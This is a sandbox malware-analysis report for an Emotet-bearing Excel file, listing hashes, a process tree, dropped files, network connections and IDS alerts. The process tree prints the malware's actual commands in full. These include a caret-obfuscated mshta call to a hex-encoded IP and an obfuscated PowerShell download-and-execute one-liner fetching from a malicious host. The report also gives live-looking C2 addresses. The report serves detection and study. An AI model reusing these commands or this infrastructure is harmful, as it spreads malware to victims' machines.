File name: | ade5c2c45c5bbae939364326ae43a74c8b0c93307b7c653b12b80cbe8e891b70.xls |
Full analysis: | https://app.any.run/tasks/e5694e14-2244-433b-8b3f-a5278bdc19a8 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | January 24, 2022, 18:35:10 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 20 19:00:43 2022, Last Saved Time/Date: Thu Jan 20 19:07:37 2022, Security: 0 |
MD5: | 3F7F1F6050609317474B8F48EFA00E88 |
SHA1: | C95BFBC3794A4371D3B5A6702052D662DEE19A15 |
SHA256: | ADE5C2C45C5BBAE939364326AE43A74C8B0C93307B7C653B12B80CBE8E891B70 |
SSDEEP: | 1536:bpEk3hbdlylKsgqopeJBWhZFGkE+cL2NdA8eXZiozeOgXVZKyaZpvyR1kZkJvU+:bCk3hbdlylKsgqopeJBWhZFGkE+cL2Nr |
.xls | | | Microsoft Excel sheet (78.9) |
---|
HeadingPairs: |
|
---|---|
TitleOfParts: |
|
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
Company: | - |
CodePage: | Windows Cyrillic |
Security: | None |
ModifyDate: | 2022:01:20 19:07:37 |
CreateDate: | 2022:01:20 19:00:43 |
Software: | Microsoft Excel |
LastModifiedBy: | xXx |
Author: | xXx |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2760 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
4004 | cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe2.html | C:\Windows\system32\cmd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2112 | mshta http://0xb907d607/fer/fe2.html | C:\Windows\system32\mshta.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
3568 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fe2.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) | ||||
2160 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2836 | cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe2.html | C:\Windows\system32\cmd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2756 | mshta http://0xb907d607/fer/fe2.html | C:\Windows\system32\mshta.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
3624 | "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe2_ Global\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" | C:\Windows\system32\SearchProtocolHost.exe | — | SearchIndexer.exe |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft Windows Search Protocol Host Version: 7.00.7601.24542 (win7sp1_ldr_escrow.191209-2211) | ||||
188 | "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString | C:\Windows\system32\cmd.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
4000 | C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString | C:\Windows\SysWow64\rundll32.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2760 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR2FC7.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2160 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR4CF4.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2760 | EXCEL.EXE | C:\Users\admin\Desktop\ade5c2c45c5bbae939364326ae43a74c8b0c93307b7c653b12b80cbe8e891b70.xls | document | |
MD5:0C00DD09ABCD52959A10C78BA946966C | SHA256:4D753B780F7F9393E7F9D0B46BE3DE0F2030D0FA788733E1BC028F90BB5A0CD4 | |||
2760 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF35594201F23110FA.TMP | atn | |
MD5:CDFB84B601CD88D28A25B871ABD3BEC1 | SHA256:DEA75B3664ECD4E1AA6329704610C7712C90633D8BF552F00724A2FF372C4C3E | |||
2760 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | ini | |
MD5:105A209345F69A8DF243BCB9A739ABC2 | SHA256:C114D70146ED4D9DA72D86BD4E967168433A825020139060BC3E630F58DE83C9 | |||
2160 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\ade5c2c45c5bbae939364326ae43a74c8b0c93307b7c653b12b80cbe8e891b70 - Copy.xls.LNK | lnk | |
MD5:69E5EF0CA4B56427BED2E5958882CFED | SHA256:A643A5426D774BFFB4212B0478998CF81E10D7D6B2DBE1F153AA178C5742AC5A | |||
2760 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\ade5c2c45c5bbae939364326ae43a74c8b0c93307b7c653b12b80cbe8e891b70.xls.LNK | lnk | |
MD5:93C3D0747A651BA6D5093BADEB28CDBB | SHA256:5744991AB2D694ED982D74A675618A409F482946DB202A6FA00951286ADF2D4B | |||
2112 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\fe2[1].htm | binary | |
MD5:9F303AED27F68A19797E11246A1EDE5B | SHA256:6C10CCD246F588BE4BBBCF68605023CDFEAE0A210C0ED96836A2B2CE6340268B | |||
3568 | powershell.exe | C:\Users\Public\Documents\ssd.dll | executable | |
MD5:5FC018538B34E891E67D7CCD6A6F5169 | SHA256:8187FDAB6CF2AE48ADACE0A38973B64D2164AEDDD5EE27ECA0C55F5F8683BFAF | |||
2756 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\fe2[1].htm | binary | |
MD5:9F303AED27F68A19797E11246A1EDE5B | SHA256:6C10CCD246F588BE4BBBCF68605023CDFEAE0A210C0ED96836A2B2CE6340268B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2112 | mshta.exe | GET | 200 | 185.7.214.7:80 | http://185.7.214.7/fer/fe2.html | FR | binary | 10.8 Kb | malicious |
3568 | powershell.exe | GET | 200 | 104.21.82.47:80 | http://hindimedia.in/wp-content/uploads/iXntuGFqLE31oHsTk/ | US | executable | 612 Kb | suspicious |
2756 | mshta.exe | GET | 200 | 185.7.214.7:80 | http://185.7.214.7/fer/fe2.html | FR | binary | 10.8 Kb | malicious |
472 | powershell.exe | GET | 200 | 185.7.214.7:80 | http://185.7.214.7/fer/fe2.png | FR | text | 1011 b | malicious |
3568 | powershell.exe | GET | 200 | 185.7.214.7:80 | http://185.7.214.7/fer/fe2.png | FR | text | 1011 b | malicious |
3484 | rundll32.exe | GET | 200 | 23.32.238.178:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?42eef2dbfbfa4388 | US | compressed | 4.70 Kb | whitelisted |
3484 | rundll32.exe | GET | 200 | 23.32.238.178:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?1c5128f6c0972824 | US | compressed | 59.9 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 104.21.82.47:80 | hindimedia.in | Cloudflare Inc | US | suspicious |
2112 | mshta.exe | 185.7.214.7:80 | — | Qual.it S.a.s. | FR | malicious |
3484 | rundll32.exe | 131.100.24.231:80 | — | GOPLEX TELECOMUNICACOES E INTERNET LTDA - ME | BR | malicious |
— | — | 172.67.153.105:80 | hindimedia.in | — | US | suspicious |
472 | powershell.exe | 185.7.214.7:80 | — | Qual.it S.a.s. | FR | malicious |
3568 | powershell.exe | 185.7.214.7:80 | — | Qual.it S.a.s. | FR | malicious |
472 | powershell.exe | 104.21.82.47:80 | hindimedia.in | Cloudflare Inc | US | suspicious |
3484 | rundll32.exe | 23.32.238.178:80 | ctldl.windowsupdate.com | XO Communications | US | suspicious |
3484 | rundll32.exe | 209.59.138.75:7080 | — | Liquid Web, L.L.C | US | malicious |
2756 | mshta.exe | 185.7.214.7:80 | — | Qual.it S.a.s. | FR | malicious |
Domain | IP | Reputation |
---|---|---|
hindimedia.in |
| suspicious |
ctldl.windowsupdate.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
3568 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3568 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3568 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3484 | rundll32.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 5 |
3484 | rundll32.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 14 |